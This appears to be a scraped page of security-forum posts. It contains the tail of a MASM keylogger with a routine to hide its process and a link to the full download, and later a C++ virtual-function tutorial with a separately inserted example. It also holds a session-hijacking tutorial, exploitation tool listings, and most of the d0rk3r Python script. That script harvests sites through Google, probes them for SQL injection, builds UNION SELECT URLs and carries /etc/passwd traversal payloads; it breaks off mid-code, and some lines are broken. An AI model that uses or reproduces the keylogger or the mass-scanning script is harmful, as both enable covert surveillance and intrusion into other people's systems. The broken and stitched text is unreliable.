        INVOKE lstrcpy, addr_buffer, ADDR k_control
        MOV len_string, 9
    ;(12h) Virtual-key code for the Alt key
    .ELSEIF EAX == 12h
        INVOKE lstrcpy, addr_buffer, ADDR k_alt
        MOV len_string, 5
    ;(0Dh) Virtual-key code for the Enter key
    .ELSEIF EAX == VK_RETURN
        MOV AX, 0A0Dh
        MOV EBX, addr_buffer
        MOV WORD PTR [EBX], AX
        MOV len_string, 2
    ;Numbers
    .ELSEIF EAX >= 30h && EAX <= 39h
        MOV EAX, virtualkeycode
        MOV EBX, addr_buffer
        MOV BYTE PTR [EBX], AL
        ;The string of the key's name is 1 byte in length
        MOV len_string, 1
    .ELSEIF EAX == VK_LEFT
        INVOKE lstrcpy, addr_buffer, ADDR k_left
        MOV len_string, 6
    .ELSEIF EAX == VK_UP
        INVOKE lstrcpy,
addr_buffer, ADDR k_up MOV len_string, 4 .ELSEIF EAX == VK_RIGHT INVOKE lstrcpy, addr_buffer, ADDR k_right MOV len_string, 7 .ELSEIF EAX == VK_DOWN INVOKE lstrcpy, addr_buffer, ADDR k_down MOV len_string, 6 .ELSEIF EAX == VK_NUMPAD0 INVOKE lstrcpy, addr_buffer, ADDR k_numpad0 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD1 INVOKE lstrcpy, addr_buffer, ADDR k_numpad1 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD2 INVOKE lstrcpy, addr_buffer, ADDR k_numpad2 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD3 INVOKE lstrcpy, addr_buffer, ADDR k_numpad3 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD4 INVOKE lstrcpy, addr_buffer, ADDR k_numpad4 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD5 INVOKE lstrcpy, addr_buffer, ADDR k_numpad5 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD6 INVOKE lstrcpy, addr_buffer, ADDR k_numpad6 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD7 INVOKE lstrcpy, addr_buffer, ADDR k_numpad7 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD8 INVOKE lstrcpy, addr_buffer, ADDR k_numpad8 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD9 INVOKE lstrcpy, addr_buffer, ADDR k_numpad9 MOV len_string, 10 .ELSEIF EAX == VK_DIVIDE || EAX == 0BFh MOV AL, '/' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_MULTIPLY MOV AL, '*' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_SUBTRACT || EAX == 0BDh MOV AL, '-' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_ADD MOV AL, '+' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_DECIMAL || EAX == 0BEh MOV AL, '.' 
MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0C0h MOV AL, '`' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BAh MOV AL, ';' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BBh MOV AL, '=' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BCh MOV AL, ',' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DBh MOV AL, '[' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DCh || EAX == 0E2h MOV AL, '\' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DDh MOV AL, ']' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DEh MOV AL, 27h MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSE INVOKE lstrcpy, addr_buffer, ADDR k_unknown MOV len_string, 9 .ENDIF MOV EAX, len_string RET TranslateVirtualKeyCode ENDP ;******************************************************************************************************************* ;******************************************************************************************************************* dlgabout PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM .IF uMsg==WM_INITDIALOG INVOKE MessageBeep, NULL INVOKE GetDlgItem, hDlg, IDC_BUTTON3 INVOKE SetFocus, EAX .ELSEIF uMsg == WM_CLOSE INVOKE EndDialog, hDlg, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON3 INVOKE SendMessage, hDlg, WM_CLOSE, NULL, NULL .ENDIF .ELSE MOV EAX, FALSE RET .ENDIF MOV EAX, TRUE RET dlgabout ENDP ;******************************************************************************************************************* ;This function will try to hide this program from the task list. If successful, return 0; else ;returns -1 (0FFFFFFFFh). 
;******************************************************************************************************************* HideProcess PROC LOCAL h_kernel:DWORD, addr_function:DWORD, return_val:DWORD INVOKE GetModuleHandle, ADDR kernel_name MOV h_kernel, EAX INVOKE GetProcAddress, h_kernel, ADDR kernel_function MOV addr_function, EAX .IF EAX == NULL MOV return_val, -1 .ELSE PUSH 1 PUSH 0 CALL EAX AND return_val, 0 .ENDIF MOV EAX, return_val RET HideProcess ENDP ;******************************************************************************************************************* END start Download (complet): http://win32assembly.online.fr/files/KeyLogV1-1.zip
  7. [C++] Virtual functions

Since I had something on this subject in OOP (object-oriented programming) at college, I decided to write a small "tutorial". I think it can be understood well this way, by direct example. Nicely coloured: http://pastebin.com/NFWwf9Qv

What it is about:

/*
Topic: A few things about constructors, destructors, virtual functions, (up/down)casting in C++
Author: Ionut Gabriel Popescu
Date: 06 April 2011
*/

#include <iostream>
using namespace std;

// A base class
class Vehicul
{
public:
    // Constructor and destructor
    Vehicul() { cout<<"Constructor Vehicul"<<endl; }
    ~Vehicul() { cout<<"Destructor Vehicul"<<endl; }

    // Copy, assignment
    Vehicul(const Vehicul &ob) { cout<<"Constructor de copiere Vehicul"<<endl; }
    Vehicul& operator = (const Vehicul &ob) { cout<<"Operator = Vehicul"<<endl; return *this; }

    // Functions for the tests
    virtual void virtuala() { cout<<"Functia virtuala() Vehicul"<<endl; }
    void nevirtuala() { cout<<"Functia nevirtuala() Vehicul"<<endl; }
};

// A derived class
class Masina: public Vehicul
{
public:
    // Constructor and destructor
    Masina() { cout<<"Constructor Masina"<<endl; }
    ~Masina() { cout<<"Destructor Masina"<<endl; }

    // Copy and assignment
    Masina(const Masina &ob) { cout<<"Constructor de copiere Masina"<<endl; }
    Masina& operator = (const Masina &ob) { cout<<"Operator = Masina"<<endl; return *this; }

    // For the tests
    void virtuala() { cout<<"Functia virtuala() Masina"<<endl; }
    void nevirtuala() { cout<<"Functia nevirtuala() Masina"<<endl; }

    // Downcasting: when we assign a base-class object to an object of the derived class
    Masina(const Vehicul &ob) { cout<<"Constructor de copiere Masina"<<endl; }
    Masina& operator = (const Vehicul &ob) { cout<<"Operator = Masina"<<endl; return *this; }
};

int main()
{
    // Create an object of type Vehicul and a pointer to this type
    cout<<"-- Se creaza obiectul o_vehicul --"<<endl;
    Vehicul o_vehicul, *p_vehicul;
    cout<<"-- A fost creat obiectul o_vehicul --"<<endl<<endl;

    // Then create the object of type Masina. The constructor of the base class, Vehicul, is called first, then the constructor of the (derived) class Masina
    cout<<"-- Se creaza obiectul o_masina --"<<endl;
    Masina o_masina, *p_masina;
    cout<<"-- A fost creat obiectul o_masina --"<<endl<<endl;

    // The cases where a pointer to Vehicul is assigned the address of a Vehicul, and likewise for Masina, are not worth considering
    // There is no late binding, the call is known at compile time, the methods are called normally

    // Test run-time polymorphism.
    // Assign to a pointer to the base class the address of a derived object (or a pointer to a derived object)
    // The compiler knows how to make the (implicit) conversion from "derived" to "base"
    p_vehicul = &o_masina;

    // Call the test functions to see what happens
    cout<<"-- Apelam metodele pentru teste (Cazul I) --"<<endl;
    p_vehicul -> virtuala();
    p_vehicul -> nevirtuala();
    cout<<"-- Am apelat metodele pentru teste --"<<endl;
    // As can be seen, the virtual function from Masina is called, which is what we want, since we assigned the address of a Masina object to the pointer
    // The non-virtual function, however, is called from the base class

    // p_masina = p_vehicul; would generate a compile error, the conversion cannot be made
    // p_vehicul = p_masina; would run without any problem, explicit conversions
    cout<<endl;

    // If we assign a derived object to a base object
    // The operator = from the base class is called, because the implicit conversion from Masina (derived) to Vehicul (base) is made
    cout<<"-- Atribuire: de_baza = derivat --"<<endl;
    o_vehicul = o_masina;
    cout<<"-- Am facut atribuirea --"<<endl;
    // So the operator = from the base class, Vehicul, is called
    cout<<endl;

    // But what happens if we want to assign a base-class object to a derived object? (downcasting)
    // There are no implicit conversions for this, but we can define them ourselves
    // And we did that by defining the copy constructor of the derived class, and the overload of = with a base-class object as parameter
    cout<<"-- Atribuire: derivat = de_baza --"<<endl;
    o_masina = o_vehicul;
    cout<<"-- Am facut atribuirea --"<<endl;
    // So the operator = from Masina (derived) with a base-class object as parameter is called
    cout<<endl;

    // Downcasting with pointers?
    // Make the explicit conversion from Vehicul (base) to Masina (derived)
    p_masina = (Masina *)&o_vehicul;
    // And call our methods to see what happens
    cout<<"-- Apelam metodele pentru teste (Cazul II) --"<<endl;
    p_masina -> virtuala();
    p_masina -> nevirtuala();
    cout<<"-- Am apelat metodele pentru teste --"<<endl;
    // As can be seen, the virtual method from Vehicul (base) and the non-virtual method from Masina (derived) are called

    // As you should know: if an object has one or more virtual methods, a table (vTable) is created which contains pointers to the object's virtual methods
    // And for the class with virtual methods a pointer to that table is created, hidden from the programmer, which for information takes another 4 bytes (on 32-bit systems) for the class
    // And virtual methods are called through that pointer. For each class that contains 1+ virtual methods such a table is created
    // Such a table is created for the class, not for each object, so we can have 2000 objects and there will be a single table
    // For the derived class, in that table, the methods that override (overriding != overloading) the virtual ones replace those from the base class
    // And when a virtual method is called, the method from that table is called, which, if it was overridden, will be the one from the derived class

    // Case I
    // Take the first case: upcasting, the classic one, when we assign to a pointer to a base class the address of a derived object (or a pointer to a derived object)
    // At p_vehicul = &o_masina; the pointer p_vehicul will point to the address of the object o_masina, even though it is of type Masina (derived)
    // Thus it will also point to the vTable pointer of the class Masina, so a call to virtuala() will call the method from the class Masina (the derived one), which is what we need
    // And a call to nevirtuala(), given that it is a pointer to Vehicul, will call the method nevirtuala() from the class Vehicul

    // Case II
    // Now take the downcasting case, when we have a pointer to a derived object (p_masina) and we assign it, through an explicit conversion (Masina*), the address of a base object (Vehicul)
    // Thus p_masina is a pointer of type Masina and points to an object of type Vehicul
    // Since it is of type Masina, calling the method nevirtuala() will call the method from the class Masina
    // And since this pointer points to an object of type Vehicul, the vTable pointer will point to the method table of the class Vehicul
    // So calling the method virtuala() will call virtuala() from the class Vehicul

    cout<<endl<<"-- Se iese din program --"<<endl;
    // I hope you understood, and I hope I haven't said anything stupid
    return 0;
}

I'm waiting for an opinion from someone interested in C++ OOP. I tried to cover as much as possible, but what I covered is what interested me, and these are concepts that cause an awful lot of problems in C++. I hope it is useful to someone.
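As an added example (not part of the post above), the post's two cases with the downcast of Case II done through dynamic_cast, which checks the run-time type instead of trusting the C-style cast; the class names follow the post, while the `roti` member is hypothetical and only there to show what an unchecked cast would touch:

```cpp
#include <string>

// Reduced version of the post's hierarchy: one virtual and one non-virtual member.
// The destructor is virtual here so that a Masina can be deleted through a Vehicul*;
// the post's classes lack this, which is harmless there because nothing is deleted
// through a base pointer.
struct Vehicul {
    virtual ~Vehicul() {}
    virtual std::string virtuala() const { return "Vehicul::virtuala"; }
    std::string nevirtuala() const { return "Vehicul::nevirtuala"; }
};

struct Masina : Vehicul {
    std::string virtuala() const override { return "Masina::virtuala"; }
    std::string nevirtuala() const { return "Masina::nevirtuala"; }
    int roti = 4;   // hypothetical member that only Masina has (not in the post)
};

// Case I of the post (upcasting): the virtual call goes through the vtable of the
// object actually pointed to (Masina); the non-virtual call follows the pointer's
// static type (Vehicul).
std::string upcast_calls() {
    Masina m;
    Vehicul* pv = &m;
    return pv->virtuala() + "|" + pv->nevirtuala();
}

// Case II of the post (downcasting), done with dynamic_cast: it consults the run-time
// type and yields a null pointer when the object is only a Vehicul, so the Masina-only
// member `roti` is never read from memory that does not hold a Masina.
// Returns how many of the two pointers were accepted as a Masina.
int safe_downcast_count() {
    Masina m;
    Vehicul v;
    Vehicul* ptrs[2] = { &m, &v };
    int accepted = 0;
    for (Vehicul* p : ptrs) {
        if (Masina* pm = dynamic_cast<Masina*>(p)) {
            if (pm->roti == 4) ++accepted;   // safe: pm really points at a Masina
        }
    }
    return accepted;   // 1: only &m passes the check
}

// The post's C-style cast performs no check at all: it always produces a non-null
// Masina*, even for a plain Vehicul, and reading Masina-only members through it is
// undefined behaviour (type confusion). Only the pointer is formed here, never used.
bool cstyle_cast_is_unchecked() {
    Vehicul v;
    Masina* pm = (Masina*)&v;
    return pm != nullptr;
}
```

Compile with `-Wall -Wextra` and the `nevirtuala` hiding in Masina is silent; `dynamic_cast` is what turns the post's Case II from a silent misinterpretation into a checkable failure.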
  8. It's a collection of programs; it's possible that those programs are detected as "HackTool" or something similar, so that they do no harm, but it's also very possible that those tools are infected. Of course, this application itself may be infected too. But virtual machines exist.
  9. Nytro

    Faq

    Well, there aren't very many Java enthusiasts around here; welcome.
  10. Seems normal to me... Stop coming with this kind of comment. If you can't open it, move on.
  11. Advanced MySQL Exploitation by Muhaimin Dzulfakar

Contents
1 Abstract
2 Introduction
3 Stacked Query
4 Attacking MySQL on applications that do support stacked queries
5 Attacking MySQL on applications that do not support stacked queries
6 Fingerprinting the web server directory
6.1 Fingerprint through error message method
6.2 Fingerprint through LOAD_FILE method
7 Maximum size of arbitrary code allowed
8 Arbitrary file compression/decompression
9 Dealing with columns
10 Remote code execution on LAMP
11 Remote code execution on WAMP
References

Download: http://dl.packetstormsecurity.net/papers/database/mysql-exploitation.pdf
  12. Session Hijacking Basics

# language: English
# Title: Session Hijacking Basic
# Date: 2011-01-13
# Author: Filipe Barros/@barros_filipe

| +01 - Session Fixation
| +02 - Session Hijacking
| +03 - Firesheep

Have fun

====== +01 - Session Fixation ======

The attacker attempts to gain access to another user's session by posing as that user. The information for an attacker is the session identifier, because this is required for any impersonation attack. There are three common methods used to obtain a valid session identifier:

* Fixation
* Capture
* Prediction

Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation.

Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been in Internet Explorer, and cookies are slightly less exposed than GET variables. For those users who enable cookies, you can provide them with a more secure mechanism by using a cookie to propagate the session.

Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable.

To demonstrate session fixation, I'll use the following script, session-hijacking.php:

[ Begin PHP CODE ]
<?php
session_start();
if (!isset($_SESSION['visits'])) {
    $_SESSION['visits'] = 1;
} else {
    $_SESSION['visits']++;
}
echo $_SESSION['visits'];
?>
[ End PHP CODE ]

First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated.

If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure:

[ Begin PHP CODE ]
<?php
session_start();
if (!isset($_SESSION['initiated'])) {
    session_regenerate_id();
    $_SESSION['initiated'] = true;
}
?>
[ End PHP CODE ]

The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack.

====== +02 - Session Hijacking ======

If your session mechanism has only session_start(), you are vulnerable. With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification.

Recall a typical HTTP request:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we're only interested in complicating impersonation without adversely affecting legitimate users.

Imagine that the previous request is followed by a request with a different User-Agent:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check:

[ Begin PHP CODE ]
<?php
session_start();
if (isset($_SESSION['HTTP_USER_AGENT'])) {
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
        /* Prompt for password */
        exit;
    }
} else {
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
?>
[ End PHP CODE ]

Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure.

Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain, but it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token:

<?php
$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';
/* Add any other data that is consistent */
$fingerprint = md5($string);
?>

Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing).

In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query.

There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start() as well as be able to come up with a few ideas of your own.

====== +03 - Firesheep ======

Recently a Firefox extension called Firesheep has exploited and made it easy for public wifi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the Firesheep user to easily access private information from cookies and threaten the public wifi users' personal property.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.

Thanks!

Source: http://packetstormsecurity.org/files/view/97548/session-hijackbasic.txt
  13. yInjector MySQL Injection Tool

yInjector is a MySQL injection penetration tool. It has multiple features, proxy support, and multiple exploitation methods.

Download: http://dl.packetstormsecurity.net/UNIX/scanners/yInjector.tar.gz
Details: http://y-osirys.com/softwares/#subsec=m-softwares,id=10,title=yInjector%20-%20SQL%20Inj%20Penetration%20Tool
  14. Mptcp Packet Manipulator 1.7

Mptcp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involve the use of the various types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulate various fields at runtime. These fields can be modified in its structure, such as the Source/Destination IP address and Source/Destination MAC address.

Download: http://dl.packetstormsecurity.net/UNIX/scanners/mptcp-1.7-en.tar.gz
Details: http://www.hexcodes.org/mptcp.i
  15. yCrawler Web Crawling Utility

yCrawler is a web crawler that is useful for grabbing all user-supplied input related to a given website and will save the output. It has proxy and log file support.

Download: http://dl.packetstormsecurity.net/UNIX/scanners/yCrawler.tar.gz
Details: http://y-osirys.com/
  16. XSSer Penetration Testing Tool 1.5-1

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications. It contains several options to try to bypass certain filters, and various special techniques of code injection.

Download: http://dl.packetstormsecurity.net/UNIX/scanners/xsser_1.5-1.tar.gz
Details: http://sourceforge.net/projects/xsser/
  17. WATOBO Web Application Toolbox Auditor 0.9.6rev266

WATOBO, the Web Application Toolbox, is a tool that enables security professionals to perform highly efficient (semi-automated) web application security audits. It acts like a local proxy and analyzes the traffic on the fly for helpful information and vulnerabilities. It also has automated scanning capabilities, e.g. SQL injection, cross site scripting and more.

Changes: Now supports one-time tokens. NTLM authentication added. FileFinder plugin added. Various other additions.

Download: http://dl.packetstormsecurity.net/UNIX/scanners/watobo_0.9.6rev266.zip
Details: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page
  18. Scapy Packet Manipulation Tool 2.2.0

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.

Changes: This release adds a contrib section filled with old contributions that were not distributed with Scapy yet: CDP, IGMP, MPLS, CHDLC, SLARP, WPA EAPOL, DTP, EIGRP, VQP, BGP, OSPF, VTP, RSVP, EtherIP, RIPng, and IKEv2. It fixes some bugs.

Download: http://dl.packetstormsecurity.net/UNIX/scanners/scapy-2.2.0.tar.gz
Details: https://www.secdev.org/projects/scapy/
  19. d0rk3r Local File Inclusion / SQL Injection Scanner

d0rk3r is a python script that uses search engines to find sites vulnerable to SQL injection and local file inclusion issues.

#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : d0rk3r.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.1
# About : No proxy support in this version, will put it in next one ...
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org
#
#
# Example of use : ./d0rk3r.py -i id= -s com -c redfront -f php -m 500
# U have two options, SQLi or LFI scanning .
# When found site vuln to sqli, then it try to find number of columns
# After scanning check d0rk3r.txt for more info

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, time
from random import choice
from optparse import OptionParser

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

colMax = 20
log = "d0rk3r.txt"
logfile = open(log, "a")
threads = []
numthreads = 1
lfinumthreads = 8
timeout = 4
socket.setdefaulttimeout(timeout)

W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m";

rSA = [2,3,4,5,6]

CXdic = {'blackle': '013269018370076798483:gg7jrrhpsy4',
         'ssearch': '008548304570556886379:0vtwavbfaqe',
         'redfront': '017478300291956931546:v0vo-1jh2y4',
         'bitcomet': '003763893858882295225:hz92q2xruzy',
         'dapirats': '002877699081652281083:klnfl5og4kg',
         'darkc0de': '009758108896363993364:wnzqtk1afdo',
         'googuuul': '014345598409501589908:mplknj4r1bu'}

SQLeD = {'MySQL': 'error in your SQL syntax',
         'Oracle': 'ORA-01756',
         'MiscError': 'SQL Error',
         'MiscError2': 'mysql_fetch_row',
         'MiscError3': 'num_rows',
         'JDBC_CFM': 'Error Executing Database Query',
         'JDBC_CFM2': 'SQLServer JDBC Driver',
         'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
         'MSSQL_Uqm': 'Unclosed quotation mark',
         'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
         'MS-Access_JETdb': 'Microsoft JET Database'}

lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00",
        "/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

filetypes = ['php','php5','asp','aspx','jsp','htm','html','cfm']

header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
          'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
          'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
          'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
          'Microsoft Internet Explorer/4.0b1 (Windows 95)',
          'Opera/8.00 (Windows NT 5.1; U; en)',
          'amaya/9.51 libwww/5.4.0',
          'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
          'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
          'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
          'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
          'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
          'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']

gnum = 100

def logo():
    print G+"\n|---------------------------------------------------------------|"
    print "| b4ltazar[@]gmail[dot]com |"
    print "| 02/2011 d0rk3r.py v.0.1 |"
    print "| |"
    print "|---------------------------------------------------------------|\n"
    print "\n[-] %s\n" % time.strftime("%X")

def cxeSearch(go_inurl,go_site,go_cxe,go_ftype,maxc):
    uRLS = []
    counter = 0
    while counter < int(maxc):
        jar = cookielib.FileCookieJar("cookies")
        query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype
        results_web = 'http://www.google.com/cse?'+go_cxe+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
        request_web = urllib2.Request(results_web)
        agent = random.choice(header)
        request_web.add_header('User-Agent', agent)
        opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
        text = opener_web.open(request_web).read()
        strreg = re.compile('(?<=href=")(.*?)(?=")')
        names = strreg.findall(text)
        counter += 100
        for name in names:
            if name not in uRLS:
                if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                    pass
                elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
                    pass
                else:
                    uRLS.append(name)
    tmpList = []; finalList = []
    print "[+] URLS (unsorted) :", len(uRLS)
    for entry in uRLS:
        try:
            t2host = entry.split("/",3)
            domain = t2host[2]
            if domain not in tmpList and "=" in entry:
                finalList.append(entry)
                tmpList.append(domain)
        except:
            pass
    print "[+] URLS (sorted) :", len(finalList)
    return finalList

class injThread(threading.Thread):
    def __init__(self,hosts):
        self.hosts=hosts;self.fcount = 0
        self.check = True
        threading.Thread.__init__(self)

    def run (self):
        urls = list(self.hosts)
        for url
in urls: try: if self.check == True: ClassicINJ(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False class lfiThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts;self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicLFI(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in SQLeD.items(): if re.search(eMSG, source): print R+"\nw00t!,w00t!:", O+host, B+"Error:", type #logfile.write("\n"+host) findcol(url) else: pass except: pass def findcol(url): print "\n[+] Attempting to find the number of columns ..." checkfor = [] firstgo = "True" site = url+"+and+1=2+union+all+select+" makepretty = "" for a in xrange(0,colMax): darkc0de = "dark"+str(a)+"c0de" checkfor.append(darkc0de) if firstgo == "True": site = site+"0x"+darkc0de.encode("hex") firstgo = "False" else: site = site+",0x"+darkc0de.encode("hex") finalurl = site+"--" source = urllib2.urlopen(finalurl).read() for b in checkfor: colFound = re.findall(b,source) if len(colFound) >= 1: print "\n[+] Column Length is:",len(checkfor) b = re.findall(("\d+"), print "[+] Found null column at column #:",b[0] firstgo = "True:" for c in xrange(0,len(checkfor)): if firstgo == "True": makepretty = makepretty+str(c) firstgo = "False" else: makepretty = makepretty+","+str(c) print "[+] Site URL:",url+"+and+1=2+union+all+select+"+makepretty+"--" url = url+"+and+1=2+union+all+select+"+makepretty+"--" url = url.replace(","+b[0]+",",",darkc0de,") url = url.replace("+"+b[0]+",","+"+"darkc0de,") url = url.replace(","+b[0],",darkc0de") print "[+] darkc0de URL:",url logfile.write("\n"+url) def ClassicLFI(url): lfiurl = url.rsplit('=' ,1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: print 
